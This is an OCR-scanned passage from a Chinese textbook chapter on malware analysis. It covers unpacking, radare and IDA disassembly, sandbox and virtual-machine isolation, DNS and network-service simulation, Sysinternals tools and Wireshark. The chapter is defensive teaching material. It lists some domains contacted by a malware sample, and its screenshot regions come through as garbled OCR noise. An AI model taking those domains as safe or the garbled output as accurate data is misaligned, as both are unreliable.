具 进 行 手工 脱 壳 ,还 原 真 实 恶意 代码 。 对 脱 壳 技 术 感 兴趣 的 读者 可 以 进一步 查阅 相关 
Ur M 


Fie: (C:workisamplesiMega-D.exe. 


Entrypoint: 0003670 EP Section: PXI 
Fle Offset: [0017070 First Bytes: 60,8E,00,00 
Linker Info: B12 Subsystem: Wra2 GUI 


[IPK -> www, ups sourceforge.net * 


az Eee Ce [ae — Ce 














Advanced Sean 
[1 

Decrypt DEF 

Decrypt WPXShit 

EPScan 

ExtOverlay Plugin by Bob 





Æ 8-6 PEiD 的 插件 功能 


代码 加 过 等 保护 技术 并 不 是 恶意 代码 才 会 使 用 ,很 多 合法 软件 也 需要 利用 加 这 等 代 
码 保 护 技术 保护 自身 的 核心 代码 ,以 免 遭 受 盗版 .破解 等 非法 行为 的 侵害 。 恶 意 代码 作者 
为 了 提高 代码 保护 的 力度 ,也 会 采用 商业 级 的 保护 技术 ,如 VMProtect 等 工具 ,因此 ,对 
于 采用 高 强度 保护 技术 的 混淆 代码 而 言 ,分 析 人 员 有 时 无 法 直接 还 原 真 实 代码 ,需要 采用 
动态 分 析 技 术 开 展 进一步 的 分 析 。 
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在 获得 恶意 代码 的 真实 代码 之 后 ,可 以 通过 反 汇 编 分 析 查 看 恶意 代码 的 执行 迎 辑 和 
基本 功能 。 目 前 市 面 上 有 大 量 的 开源 反 汇 编 工 具 和 商业 反 汇 编 软件 。 例 如 ,radare? 是 
一 个 开源 的 命令 行 形式 的 二 进 制 代码 分 析 框 架 , 支 持 Windows, Linux 等 操作 系统 。 


(D http://radare. nopcode. org/. 
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radare 框架 在 架构 上 采用 了 很 多 x NIX 系统 的 基本 理念 ,包括 将 任何 对 象 都 视 为 文件 , 通 
过 输入 输出 将 独立 的 小 工具 组 合 在 一 起 ,以 及 保持 简洁 等 。radare 框架 以 一 个 十 六 进 制 
编辑 器 为 核心 ,包含 很 多 实用 的 命令 行 工具 ,包括 汇编 、 反 汇编 .代码 分 析 、 脚 本 支持 、 代 码 
和 数据 可 视 化 等 工具 ,这 些 工具 都 以 raxxxx 等 形式 命名 ,主要 包括 的 工具 列举 如 下 ; 

1. radare 

radare 是 radare 框架 的 核心 工具 , 它 是 一 个 十 六 进 制 编辑 器 和 调试 器 ,可 以 文件 的 
形式 打开 各 种 类 型 的 对 象 ,包括 硬盘 、 网 络 .远程 设备 .进程 等 。 它 支持 各 种 高 级 的 文件 操 
作 , 包 括 文件 移动 .数据 分 析 、 代 码 反 汇编 ,查找 蔡 换 等 ,并 且 支 持 Ruby, Python, Lua 和 
Perl 等 脚本 语言 。 

2. rabin 

rabin 是 用 于 从 可 执行 的 二 进 制 代码 中 提取 信息 的 工具 ,支持 ELF, PE, Java 
CLASS, MACH-O 等 格式 的 二 进 制 文件 ,可 提取 导出 符号 .导入 函数 、 库 文件 依赖 、 代 码 
节 等 文件 信息 。 

3. rasm 

rasm 是 支持 多 种 架构 的 汇编 器 和 反 汇 编 器 , 它 支 持 x86. x64, MIPS, ARM, PowerPC 
等 架构 的 二 进 制 代码 分 析 和 Java, MSIL 等 中 间 语 言 代码 分 析 。 

4. rasc 

rasc 是 一 个 用 于 辅助 开展 漏洞 利用 与 分 析 的 小 工具 , 它 内 部 包含 一 个 shellcode 数据 
库 和 一 个 系统 调用 跳 转 接口 ,以 及 一 些 用 于 空 指令 填充 、 断 点 设置 等 的 辅助 功能 。 

5. rahash 

rahash 是 一 个 哈 希 计算 工具 ,支持 的 哈 希 算法 包括 MD4、MD5、CRC16、CRC32、 
SHAI1,SHA256, SHA384, SHA512, PAR, XOR, XORPAIR, MOD255, Hamdist il Xi 
(Entropy). 

6. radiff 

radiff 是 一 个 二 进 制 文件 比较 工具 , 它 支 持 字 节 级 的 比较 、 增 量 比 较 和 代码 分 析 比 
较 , 从 而 发 现 被 比较 对 象 的 基本 代码 块 中 的 差异 。 其 中 ,radiff 的 增 量 比 较 通过 将 二 进 制 
对 象 转换 成 每 行 一 个 十 六 进 制 对 的 文本 文件 ,然后 再 利用 GNU diff 进行 文本 文件 比较 ， 
间接 实现 二 进 制 文件 的 比较 。 

7. rsc 

rse 是 命令 行 控制 台中 各 种 小 脚本 和 小 工具 的 调用 入 口 。 

radare 框架 是 一 个 具有 多 种 分 析 功能 的 工具 集合 ,通过 各 种 不 同 命令 行 工具 的 连接 
组 合 以 及 大 量 命令 行 参数 进行 精确 控制 , 它 可 以 帮助 分 析 人 员 实 现 从 代码 反 汇 编 到 调试 
跟踪 等 各 种 目的 。 也 正 是 因为 这 个 原因 ,其 使 用 过 程 不 是 那么 直观 ,需要 一 定 的 学 习 过 
程 , 关 于 radare 框架 的 具体 使 用 ,可 以 查阅 其 帮助 文档 。 

IDA? 是 一 个 支持 Windows, Linux 和 Mac OS 操作 系统 的 具有 良好 图 形 用 户 界面 的 





(D http://radare. org/r/docs. html. 
© https://www. hex-rays. com/products/ida/index. shtml. 
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反 汇 编 和 调试 工具 ,其 界面 如 图 8-7 所 示 。 它 具有 非常 强大 的 功能 ,支持 x86 、x64、ARM、 
MIPS 多 种 类 型 的 CPU 架构 指令 集 ,可 分 析 PE、ELF、DEX、JAR 等 数 十 种 可 执行 代码 文 
件 格式 ,同时 支持 插件 扩展 和 脚本 功能 ,是 恶意 代码 分 析 的 强大 工具 。IDA 是 商业 软件 ， 
对 于 非 商业 用 途 , 可 以 下 载 具有 基本 分 析 功 能 的 免费 版 本 IDA 5. 09, 























图 8-7 IDA 界面 


IDA 是 非常 强大 的 工具 ,其 功能 繁多 ,不 仅 支持 静态 反 汇 编 分 析 , 同 时 还 支持 动态 调 
试 分 析 。 关 于 IDA 的 详细 使 用 介绍 ,读者 可 以 参阅 相关 书籍 中。 


8.3 动态 分 析 


由 于 存在 各 种 代码 保护 技术 、 混 淆 代码 阅读 困难 以 及 代码 规模 较 大 等 各 种 障碍 ,通过 
静态 分 析 完 全 掌握 恶意 代码 的 行为 功能 和 实现 机 理 往 往 是 困难 的 。 因 此 ,在 完成 静态 分 
析 获 得 关于 可 疑 代码 的 初步 信息 之 后 ,分 析 人 员 可 以 利用 动态 分 析 技 术 和 工具 ,通过 实际 
运行 可 疑 代码 ,观察 探测、 分 析 可 疑 代码 的 各 项 功能 和 行为 机 理 ,从 而 更 好 地 判断 可 疑 代 
码 的 恶意 性 和 危害 性 。 对 于 较为 复杂 的 恶意 代码 ,通常 静态 分 析 和 动态 分 析 是 交替 进行 
的 ,往往 需要 综合 利用 多 种 分 析 工 具 , 进 行 多 轮 分 析 才 能 得 到 较为 完整 的 分 析 结 果 。 


83.1 动态 分 析 环 境 构 建 


由 于 动态 分 析 需 要 实际 运行 被 分 析 代 码 , 因 此 ,在 对 恶意 代码 进行 动态 分 析 时 ,如 何 
确保 恶意 代码 不 对 外 部 环境 产生 破坏 和 影响 是 需要 重点 考虑 的 问题 。 通 常 ,分 析 人 员 在 
受 控 的 隔离 环境 里 进行 动态 分 析 ,将 恶意 代码 对 分 析 环境 的 影响 限制 在 特定 的 范围 内 , 同 


(D https://www. hex-rays. com/products/ida/support/download freeware. shtml. 
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时 ,借助 分 析 环 境 隔 离 工 具 , 分 析 人 员 还 可 以 快速 地 将 分 析 环 境 恢 复 到 初始 状态 ,避免 恶 
意 代 码 运行 后 对 分 析 环 境 的 污染 影响 到 后 续 其 他 样本 的 分 析 过 程 。 

有 许多 工具 可 以 用 于 构建 受 控 的 隔离 环境 ,根据 采用 的 技术 方法 的 不 同 ,可 以 分 为 沙 
箱 程序 、 虚 拟 化 软件 和 硬件 模拟 器 3 种 类 型 。 

沙 箱 程序 是 一 种 按照 用 户 制定 的 安全 策略 限制 其 他 程序 行为 的 执行 环境 。 沙 箱 程序 
一 般 通 过 加 载 自身 驱动 来 拦截 特定 的 系统 调用 ,监视 程序 行为 ,并 根据 用 户 制 定 的 安全 策 
略 来 控制 其 他 程序 对 系统 资源 的 访问 和 使 用 ,如 将 可 疑 程序 对 注册 表 、 系 统 文件 等 的 访问 
重 定向 到 指定 夹 下 ,从 而 保护 系统 资源 ,消除 可 疑 程序 对 系统 的 影响 。 典 型 的 沙 箱 程 序 包 
括 Sandboxie? ,影子 系统 PowerShadow? 等 ,在 Sandboxie 构建 的 沙 箱 中 运行 的 程序 对 
系统 造成 的 影响 可 以 在 沙 箱 程 序 关 闭 后 删除 ,在 影子 系统 的 影子 模式 下 运行 的 程序 所 做 
的 任何 改变 都 将 在 系统 重启 后 消失 。 因 此 , 沙 箱 程序 为 分 析 人 员 提 供 了 一 种 快速 测试 、 分 
析 可 疑 样 本 的 隔离 环境 。 

由 于 沙 箱 程序 是 一 个 运行 在 操作 系统 上 的 应 用 软件 ,因此 ,对 于 一 些 采 用 高 级 攻击 技 
术 的 恶意 代码 ,如 rootkit、 内 核 漏 洞 利 用 等 ,有 时 可 以 突破 沙 箱 的 隔离 限制 ,实现 沙 箱 逃 
逸 ,从 而 对 主机 系统 和 外 界 环境 造成 实质 影响 。 因 此 ,在 实际 的 恶意 代码 分 析 过 程 中 ,更 
多 的 是 利用 虚拟 化 软件 构建 虚拟 机 ,在 虚拟 机 中 运行 恶意 代码 开展 动态 分 析 。 常 用 的 虚 
拟 化 软件 包括 VMWare 和 VirtualBox 等 。 

VMWare Workstation? 虚拟 化 软件 的 功能 十 分 强大 ,可 详细 配置 每 个 虚拟 机 的 硬件 
配置 和 网 络 环境 ,可 以 方便 地 创建 镜像 快照 ,暂停 运行 过 程 。 分 析 人 员 可 以 采用 可 供 个 人 
免费 使 用 的 VMware Workstation Player®, 该 软件 能 够 运行 由 VMware Workstation 或 
VMware Fusion Pro 创建 的 虚拟 机 。 

VirtualBox@ 也 是 一 个 可 以 选择 的 虚拟 化 软件 , 它 是 遵循 GPL 许可 证 的 开源 自由 软 
件 , 支 持 32 位 和 64 位 系统 ,可 运行 在 Windows, Linux, Macintosh, Solaris 操作 系统 主机 
之 上 ,支持 Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7, Windows 8, 
Windows 10), DOS/Windows 3. x, Linux (2. 4. 2. 6. 3. x, 4. x), Solaris, OpenSolaris, 
OS/2 和 OpenBSD 等 客户 机 操作 系统 。 

除了 上 述 这 些 虚拟 化 工具 ,其 他 可 供 选 择 的 虚拟 化 软件 还 包括 KVMO9, Xen? 等 。 

虚拟 化 软件 提供 了 跨 系统 、 跨 平台 的 虚拟 化 能 力 , 同 时 具有 较 好 的 运行 效率 ,是 开展 
恶意 代码 动态 分 析 的 强大 辅助 工具 。 但 在 需要 构建 跨 系统 架构 的 虚拟 化 环境 ,或 需要 对 
代码 运行 过 程 进行 干预 和 控制 的 时 候 , 上 述 这 些 虚拟 化 软件 就 无 能 为 力 了 ,此 时 ,可 以 选 
择 硬 件 模拟 器 。 硬 件 模拟 器 提供 了 比 虚拟 化 软件 更 为 强大 的 虚拟 化 能 力 , 能 够 通过 软件 





http://www. sandboxie. com/. 

http://www. yingzixitong. cn/. 

http://www. vmware. com/cn/products/ workstation. 
http://www. vmware. com/go/downloadplayer-cn. 
https://www. virtualbox. org/. 

http://www. linux-kvm. org/. 
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技术 模拟 出 物理 主机 上 并 不 真实 存在 的 各 种 硬件 设备 ,包括 CPU、 内 存 、 硬 盘 等 核心 部 
件 , 以 及 光驱 、 键 盘 、 鼠 标 等 外 围 设备 。 典 型 的 硬件 模拟 器 包括 QEMUO Bochs? 等 。 其 
中 ,QEMU 由 于 强大 的 模拟 能 力 和 广泛 的 系统 支持 等 特点 ,被 学 术 界 和 工业 界 大 量 应 用 。 
需要 指出 的 是 ,在 运行 效率 和 易 用 性 方面 ,硬件 模拟 器 与 虚拟 化 软件 之 间 仍 有 不 小 差距 。 
例如 , 若 不 使 用 kqemu 加 速 器 ,在 QEMU 上 运行 的 虚拟 机 较 在 VMWare 等 虚拟 化 软件 
上 运行 的 虚拟 机 慢 很 多 。 

需要 注意 的 是 ,无 论 采 用 虚拟 机 软件 还 是 硬件 模拟 器 构建 动态 分 析 环境 ,都 需要 注意 
所 用 工具 软件 自身 的 安全 性 。 相 关 研 究 表 明 中 ,不论 采取 何 种 虚拟 化 技术 ,相关 的 虚拟 环 
境 构 建 工 具 都 存在 潜在 的 安全 风险 。 例 如 , VMWare 历史 上 就 被 发 现 过 多 个 严重 安全 漏 
洞 , 可 导致 恶意 代码 从 虚拟 机 中 逃逸 ,或 导致 虚拟 机 中 的 恶意 代码 可 攻击 宿主 机 系统 , 同 
时 ,QEMU 也 被 发 现 过 存在 类 似 的 安全 漏洞 ,如 CVE-2015-3456 VENOM 漏洞 ,因此 ,在 
利用 虚拟 环境 进行 恶意 代码 分 析 时 ,最 好 在 单独 的 物理 主机 上 运行 分 析 环 境 ,同时 密切 注 
意 和 宿主 机 系统 可 能 出 现 的 异常 。 

在 有 了 基础 的 虚拟 主机 环境 之 后 ,还 需要 考虑 为 动态 分 析 系 统 配置 相应 的 网 络 环 
境 。 由 于 很 多 恶意 代码 具有 网 络 访问 相关 行为 ,如 果 直 接 将 虚拟 主机 接 和 人 真实 网 络 环 
境 , 可 能 感染 真实 网 络 中 的 其 他 主机 ,导致 对 网 络 造成 攻击 和 破坏 ;而 如 果 将 虚拟 主机 
单独 隔离 ,不 配置 网 络 环境 ,那么 恶意 代码 很 可 能 因为 网 络 条 件 不 满足 而 无 法 正常 运 
行 ,从 而 导致 分 析 人 员 无 法 全 面 、 准 确 地 获得 恶意 代码 的 行为 、 功 能 等 信息 。 因 此 ,在 
恶意 代码 分 析 中 ,一 个 折 中 的 办 法 是 为 虚拟 机 配置 仿真 的 网 络 环境 ,通过 仿真 、 模 拟 恶 
意 代码 常用 的 网 络 协议 和 服务 ,如 DNS, HTTP, SMTP 等 , 既 满 足 恶意 代码 行为 激发 的 
需要 ,同时 又 避免 对 真实 网 络 造成 影响 。 在 网 络 环境 仿真 方面 可 利用 的 工具 包括 
ApateDNS INetSim 等 。 

ApateDNS? 是 Mandiant 公司 开发 的 一 款 DNS 服务 模拟 工具 。 它 有 简单 易 用 的 图 
形 化 用 户 界面 ,可 以 自动 将 本 地 的 DNS 服务 器 设置 为 本 地 主机 (localhost) ,通过 监听 本 
地 主机 的 UDP 53 号 端口 模拟 DNS 服务 器 ,并 根据 用 户 配置 对 恶意 代码 的 DNS 请 求 做 
出 响应 ,向 恶意 代码 返回 用 户 指定 的 IP。 图 8-8 是 利用 ApateDNS 模拟 DNS 服务 器 响应 
www. vvindow. com,hkhimen. 3322. org .downs. indian-info. in 等 恶意 软件 的 相关 域名 解 
析 请 求 。 

除了 DNS 之 外 ,恶意 软件 还 可 能 需要 访问 其 他 的 网 络 服务 ,为 此 ,可 以 利用 
INetSim? 网 络 服务 模拟 工具 集 。 该 工具 集 是 遵循 GPL 许可 证 的 自由 软件 ,运行 在 
Linux 环境 下 。 利 用 INetSim ,分 析 人 员 可 以 在 实验 室 环境 下 模拟 各 种 常见 的 网 络 服务 ， 
从 而 辅助 分 析 人 员 深 入 分 析 未 知 恶意 代码 的 网 络 相关 行为 。INetSim 工具 集中 包含 了 如 
下 服务 的 模拟 能 力 : HTTP/HTTPS, SMTP/SMTPS, POP3/POP3S, DNS, FTP/FTPS, 





http://fabrice. bellard. free. fr/qemu/. 
http://bochs. sourceforge. net/. 
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Time Domain Requested 
12:21:00 — www. vvindow. com 
12:21:56 hkħimen. 3322. org 
12:22:21 ^ downs. indian-info. in 


[+] Using 127.0.0.1 as retum DNS IP! 

[+] DNS set to 127.0.0.1 on AMD PCNET Family PCI Ethemet Adapter - Miet i-e rem NO. 
[+] Sending valid DNS response of first request. 

[+] Server started at 12:20:41 successfully. 





DNS Reply IP (Default: Current Gatway/DNS): ). 0. 1 Start 
Server, 


# of NXDONAIN s o ] 
Selected Interface: MID PCNET Family PCI Ethernet Adapter - W4 M d 























图 8-8 利用 ApateDNS 模拟 DNS 服务 器 响应 域名 解析 请 求 


TFTP,IRC,NTP,Ident, Finger, Syslog, Daytime, Time, Echo, Chargen, Discard, Quotd , 
Dummy. 

INetSim 支持 的 各 项 服务 的 侦 听 端口 以 及 响应 内 容 可 以 通过 配置 文件 调整 和 定制 。 

除了 可 以 通过 虚拟 化 软件 构建 专门 的 动态 分 析 环 境 之 外 ,分 析 人 员 还 可 以 采用 一 些 
预先 构建 的 ,专门 用 于 恶意 代码 分 析 的 分 析 工 具 , 如 Cuckoo Sandbox? , Norman Sandbox 
Analyzer? , Minibis?, Malware Analyser®, Zero Wine? 和 Zero Wine Tryouts@ 等 。 其 
中 ,Cuckoo Sandbox 是 一 个 开源 的 ,高 度 模块 化 的 恶意 代码 分 析 系 统 , 集 成 了 动态 行为 分 
析 、 网 络 流量 分 析 、 内 存 取 证 分 析 等 诸多 功能 .支持 Windows,OS X, Linux 和 Android 操 
作 系 统 上 的 恶意 文件 分 析 , 分 析 人 员 通 过 编写 相应 的 分 析 功 能 插件 ,定制 数据 分 析 和 报告 
产生 流程 ,可 以 快速 地 构建 一 个 自动 化 的 恶意 代码 分 析 系 统 , 如 免费 的 在 线 恶意 代码 分 析 
服务 Malwr? 就 是 基于 Cuckoo Sandbox 构建 的 。 


832 动态 行为 分 析 
观察 可 疑 代 码 在 实际 运行 时 表现 出 的 各 种 行为 ,是 确定 代码 具有 何 种 功能 ,评估 代码 





https: //cuckoosandbox. org/. 

http://www. norman. com/enterprise/all. products/malware. analyzer/norman sandbox analyzer. 
http://cert. at/downloads/software/minibis en. html. 

http://www. malwareanalyser. com/home/. 

http: //zerowine. sourceforge. net. 


http://zerowine-tryout. sourceforge. net/. 
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是 否 具有 恶意 性 的 重要 手段 。 根 据 可 疑 代 码 的 静态 分 析 结 果 , 分 析 人 员 可 以 根据 样本 的 
文件 类 型 .系统 环境 、 应 用 软件 环境 、 网 络 环境 等 要 求 ,将 可 疑 代 码 置 人 可 控 的 动态 分 析 环 
境 中 ,利用 各 种 分 析 工 具 观 察 和 监测 可 疑 代码 的 行为 和 特点 。 

可 用 于 分 析 可 疑 代 码 动态 行为 的 工具 有 很 多 ,各 种 工具 有 各 自 的 优 缺点 和 适用 范 
Hl. Windows Internals 的 作者 之 一 Mark Russinovich 编写 的 Sysinternal? 工具 集 是 动 
态 行为 分 析 中 常用 的 工具 , 它 由 一 系列 小 巧 但 非常 实用 的 Windows 系统 分 析 工 具 
组 成 。 

Process Monitor 是 Sysinternal 工具 集中 用 于 采集 和 显示 Windows 系统 文件 .注册 
表 、 进 程 线程、 网 络 、 系 统 性 能 等 相关 事件 的 强大 工具 , 它 综 合 了 Sysinternal 工具 集中 
原 有 的 Filemon 文件 操作 监视 工具 和 Regmon 注册 表 操 作 监 视 工 具 的 各 项 功能 ,可 以 实 
时 获取 并 显示 系统 当前 的 各 种 操作 事件 ,能 够 详细 显示 每 个 事件 的 发 生 时 间 、 进 程 名 、 
进程 ID .操作 名 、 操 作 路 径 、 操 作 结果 以 及 详细 的 操作 参数 内 容 。 由 于 Process Monitor 
监控 的 事件 类 型 很 多 ,因此 其 显示 的 内 容 也 非常 多 ,如 图 8-9 所 示 , 尤 其 是 在 恶意 代码 
运行 时 ,Process Monitor 将 不 断 收 集 并 实时 显示 系统 当前 的 各 种 事件 信息 ,因此 ,分 析 
人 员 很 难 在 其 中 快速 、 准 确 地 找到 需要 的 信息 。 可 以 通过 合理 设置 过 滤 条 件 排除 其 他 
无 关内 容 的 干扰 ,Process Monitor 的 过 滤 条 件 配 置 界面 如 图 8-10 所 示 。 在 实际 分 析 过 
程 中 ,分 析 人 员 还 需要 善 用 高 亮 . 显 示 的 事件 类 型 选择 等 功能 ,从 而 在 大 量 的 监控 事件 
中 准确 定位 关键 的 行为 。 例 如 ,如 果 在 分 析 过 程 中 关心 恶意 代码 执行 的 文件 操作 , 那 
么 可 以 将 注册 表 、 进 程 、 线 程 .网 络 等 其 他 操作 事件 的 监控 结果 隐藏 ,从 而 更 好 地 分 析 
我 们 关心 的 事件 内 容 。 














图 8-9 Process Monitor 显示 的 实时 监控 结果 


在 发 现 感 兴趣 的 事件 后 ,可 以 双击 该 事件 调 出 事件 属性 查看 窗口 ,如 图 8-11 所 示 , 查 
看 事件 的 详细 信息 、 相 关 的 进程 信息 和 产生 该 事件 的 操作 相关 的 调用 栈 。 
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图 8-10 Process Monitor 的 过 滤 条 件 配 置 界面 
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Ko  flügrszs — fltMgr sys + 021944 0zf84c7944 C: NRINDORSAS7 sten32VDriversMf] fg. 
Ki flüügrszs flther. srs + 023352 0zf84c9352 C:\RINDORS\System32\Drivers\fltMer 
K2  flüfgrszs — flüMgr.szs + 0z3cl5 0zf84c9c15 C:\RINDORS\S7stem32\Drivers\fltMer 
K3  flürszs — flüMgrszs + 0z3ffb 0zf84c9ffb C:\RINDORS\S7stem32\Drivers\fltMer 
K 4  ntkrnlpa.ere ntkrnlpa eze + 0zl6df9 Or804eedf9 C:\RINDORS\system32\ntkrnlpa. exe 
K 5  ntkmlpa.eze ntkrnlpa + OziTTeb Oz804efTeb C:\RINDORS\system32\ntkrnlpa. eze 
Ke  ntkrnlpa.eze ntkrnlpa + 0z3b86a 0z8051386a C:\RINDORS\s7stem32\ntkrnlpa. eze 
K7 ntkrnlpa.eze ntkrnlpa. eze + 0z455b0 0z805145b0 C:\RINDORS\system32\ntkrnlpa. exe 
Ke  ntkrnlpa.eze ntkrnlpa. + 0z686ec 0z805406ec C:\RINDORS\system32\ntkrnlpa. eze 
K 9 win32k.sys win32k. sys + 0z806f6 ^ Oxbf8806f6 C:\RINDORS\System32\win32k. sys 

K 10 win32k.sys win32k.srs + 0z80b28 0zbf880b28 C:\RINDORS\S7stem32\win32k. sys 

K 11 win32k.sys win32k.srs + OzTdfcT 0zbf87dfc7 C:\NINDORS\S7stem32\win32k. sys 

K 12 win32k.sys win32k.srs + 0ze80a2 0zbf8e80a2 C:\RINDORS\S7stem32\win32k. sys 

K 13 win32k.sys win32k.srs + 0zf6db4 0zbf8f6db4 C:\RINDORS\System32\win32k. 

Ki14 wn32k.sys win32k.srs + 0zf80ed Ozbf8f80ed C:\RINDORS\System32\win32k. 

K 15 win32k.szs win32k.srs + 0z73fa Dzbf8073fa C:\RINDORS\System32\win32k. 

K 16 win32k.sys win32k. sys + 0z7462 Ozbf807462 C:\RINDORS\S7stem32\win32k. 

K 17 win32k.sys win32k.srs + 0z32b95 0zbf832b95 C:\RINDORS\System32\win32k. 

K 18 win32k.sys win32k.sys + 0z32c05 0zbf832c05 C:\RINDORS\System32\win32k. 

K 19 ntkrnlpa.eze ntkrnlpa. eze + 0z65808 0z8053d808 C:\RINDORS\s7stem32\ntkrnlpa. eze 











Configure the symbol engine for symbols 
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Æ 8-11 Process Monitor 的 事件 属性 查看 窗口 


Sysinternal 工具 集中 的 另 一 个 常用 工具 是 Process Explorer。 该 工具 是 一 个 类 似 任 
务 管 理 器 ,但 功能 比 任务 管理 器 强大 的 高 级 进程 管理 工具 , 它 可 以 提供 一 个 进程 的 详细 信 
息 ,显示 包括 图 标 、 命 令 行 参数 .代码 镜像 路 径 、 内 存 统计 信息 、 用 户 账户 、 安 全 属性 等 各 种 
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信息 。 此 外 , 它 还 可 以 详细 列 出 一 个 进程 加 载 的 动态 链接 库 、 打 开 的 系统 资源 句柄 等 内 
容 。Process Explorer 信息 显示 界面 如 图 8-12 所 示 , 它 可 以 进程 树 的 形式 显示 当前 系统 
中 正在 运行 的 各 个 进程 ,并 详细 显示 每 个 进程 的 名 字 、 进 程 号 、 占 用 的 CPU 时 间 等 信息 。 
此 外 ,通过 菜单 控制 ,还 可 以 显示 各 个 进程 加 载 的 动态 链接 库 或 打开 的 系统 资源 句柄 
信息 


Ao 


USER-BDDD2D0 1BD Ada: 


Pip CPU Private Brtes 
3545 x 











图 8-12 Process Explorer 信息 显示 界面 


对 于 恶意 代码 分 析 而 言 ,定位 真正 执行 恶意 操作 的 代码 是 一 项 非常 重要 的 内 容 , 尤 其 
是 对 于 释放 新 的 可 执行 代码 ,注入 其 他 进程 的 代码 等 不 止 一 个 执行 体 的 恶意 代码 ,分 析 人 
员 需 要 查 明 恶意 代码 相关 的 所 有 执行 体 ,分 析 它 们 是 如 何 工作 的 ,确认 其 对 系统 造成 的 影 
响 。 利 用 Process Explorer 工具 ,可 以 通过 查看 进程 树 确认 恶意 代码 相关 进程 之 间 的 启 
动 关系 ,并 通过 查看 恶意 代码 的 文件 操作 ,搜索 各 个 进程 打开 的 系统 资源 句柄 和 加 载 的 动 
态 链接 库 ,分 析 恶 意 代码 的 注入 关系 等 。 另 外 ,针对 Process Explorer 工具 中 列举 进程 加 
载 的 动态 链接 库 和 打开 的 系统 资源 句柄 两 个 功能 ,Sysinternal 工具 集中 有 两 个 对 应 的 命 
SiT TH Handle 和 ListDLLs, 分 析 人 员 可 以 根据 自身 需求 通过 脚本 调用 这 两 个 工 
有 具 进行 各 种 形式 的 整合 分 析 。 

除了 分 析 恶 意 代 码 的 本 地 行为 之 外 ,网 络 行为 分 析 也 是 恶意 代码 动态 行为 分 析 的 重 
要 内 容 。 通 过 观察 恶意 代码 访问 的 域名 .连接 的 IP、 使 用 的 协议 .传输 的 内 容 等 ,分 析 人 
员 可 以 从 中 得 到 关于 恶意 代码 功能 、 用 途 、 来 源 、 控 制 者 等 很 多 有 用 的 信息 。 此 外 ,对 于 一 
些 依赖 网 络 条 件 触 发 的 行为 ,分 析 人 员 还 可 以 根据 对 恶意 代码 产生 的 网 络 流量 的 观察 分 
HT ,结合 网 络 服务 模拟 工具 ,对 恶意 代码 的 网 络 请 求 做 出 回应 ,从 而 激发 恶意 代码 的 相关 
行为 。 
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在 网 络 行为 分 析 方 面 ,分 析 人 员 可 以 利用 的 网 络 协议 分 析 工 具 包 括 开 源 的 
Wireshark? .免费 的 科 来 网 络 分 析 系 统 ( 技 术 交流 版 )@ 等 。Wireshark 是 一 款 功能 强大 的 
网 络 流量 捕获 与 网 络 协议 分 析 工 具 , 可 识别 和 解析 数 百 种 协议 规范 ,支持 实时 流量 捕获 与 
离线 流量 分 析 , 具有 简单 易 用 的 图 形 化 用 户 界面 ,同时 也 有 命令 行 版 本 ,并 支持 
Windows,Linux,OS X, Solaris, FreeBSD, NetBSD 等 各 种 操作 系统 。 

分 析 人 员 可 以 在 虚拟 机 中 运行 Wireshark 进行 网 络 流量 抓 取 , 也 可 以 利用 虚拟 机 的 
虚拟 网 络 功能 ,在 宿主 机 上 捕获 虚拟 机 之 间 的 网 络 流量 。 在 选择 需要 捕获 流量 的 网 卡 并 
单 击 “ 开 始 ” 之 后 ,Wireshark 将 捕获 经 过 该 网 卡 的 所 有 网 络 流量 ,并 实时 显示 相关 数据 信 
息 ,如 图 8-13 所 示 。 当 捕获 的 数据 包 较 多 时 ,可 以 通过 过 滤 条 件 将 不 相关 的 数据 包 隐 藏 ， 
或 者 在 开始 捕获 之 前 设置 相应 的 抓 包 条 件 , 过 滤 不 需要 的 数据 包 。 默 认 地 ,Wireshark 将 
显示 捕获 的 数据 包 的 概要 信息 ,包括 序号 、 时 间 、 源 地 址 、 目 的 地 址 、 协 议 类 型 .数据 包 长 度 
以 及 数据 包 内 容 。 选 中 一 个 数据 包 条 目 , 在 窗口 的 第 二 栏 将 展示 该 数据 包 的 协议 解析 结 
果 。Wireshark 会 根据 数据 包 特 征 自动 识别 协议 类 型 ,并 按照 协议 规范 对 数据 包 进 行 解 
Tr ,根据 协议 层次 和 结构 显示 各 个 字段 及 其 内 容 。 对 应 地 ,在 窗口 的 第 三 栏 , Wireshark 
会 显示 原始 数据 包 的 十 六 进 制 内 容 , 并 根据 用 户 在 窗口 第 二 栏 选中 的 协议 字段 ,同步 高 亮 
显示 相应 的 原始 数据 ,便于 用 户 对 比分 析 。 








图 前 hpatet Tris Prot DH) 67t — Paket 150% Deka FB6 (10009) Deer DG) eli ai 


图 8-13 Wireshark 捕获 的 网 络 流量 


当 发 现 感 兴趣 的 网 络 数据 包 时 ,分 析 人 员 可 以 标记 该 数据 包 , 或 者 通过 Follow TCP/ 
UDP/SSL Stream 功能 提取 相应 的 数据 包 所 在 流 的 内 容 , 如 图 8-14 所 示 , 以 便 更 好 地 分 
析 数 据 内 容 , 避 免 下 层 数据 包 协 议 细节 的 干扰 。 还 可 以 将 所 有 捕获 的 数据 包 或 者 选择 的 
竺 定数 据 包 另 存 为 tepdump 等 其 他 抓 包 工具 可 识别 的 格式 ,或 者 将 其 导出 为 KML, 
PostScript, CSV 或 纯 文 本 格式 ,以 便 在 分 析 报 告 中 加 以 利用 。 


(D https://www. wireshark. org/. 
Q http://www. colasoft. com. cn/download/capsa. php. 


第 8 章 ， 恶 意 代码 检测 与 分 析 e 


Follow ICP Stream (tcp.stream eq T) 


‘Stream Content 


RCCEDL-Larigudge: I-cN; zr; deu. 8, eti; 
ool Ns: 3SESSIONID-CDCPFGAOAi905490153E712C47178r80 


NITP/L.L S02 Found. 
IServer: Apache-Co 

Location: http //19]-168:4.186:80/Service 
(Content-Type: text/html; charset=gbk 
Transfer-Encoding: chunked 

Date: Thu, 18 Feb 2016 06:21:02 GMT 


0 








leer /service HTTP/1.1 

Host: 192.168.4.186 

Connection: keep-alive 

Cache- A max-age=0 

ent: Mozi11a/5.0 (windows NT 5.1) Applewebkit/537.36 (KHTML, like Gecko) 
Chrome/47.0.2526.111 3afári/537.36 

Referer: http://192.168.4.186/service; jsessionide4080B4CA3557565E99C3CSFA18BBE236 
Accept-Encoding: gzip, deflate, sdch 

Accept-Language: zh-CN, zh; q=0. B, en;q=0 

eSak ie: JESS TONTO -CBCr GATA OD S490 5E712C47178F80 


HTTP/1.1 200 OK 

Server: Apache-coyote/1.1 
Content-Type: gext/numl; charset=UTF-8 
Transfer-Encodint 


ed 
Date: Thu, 18 Feb 2016 06:21:02 GMT 


—M—Ó 











Entire conversation (80102 bytes) 


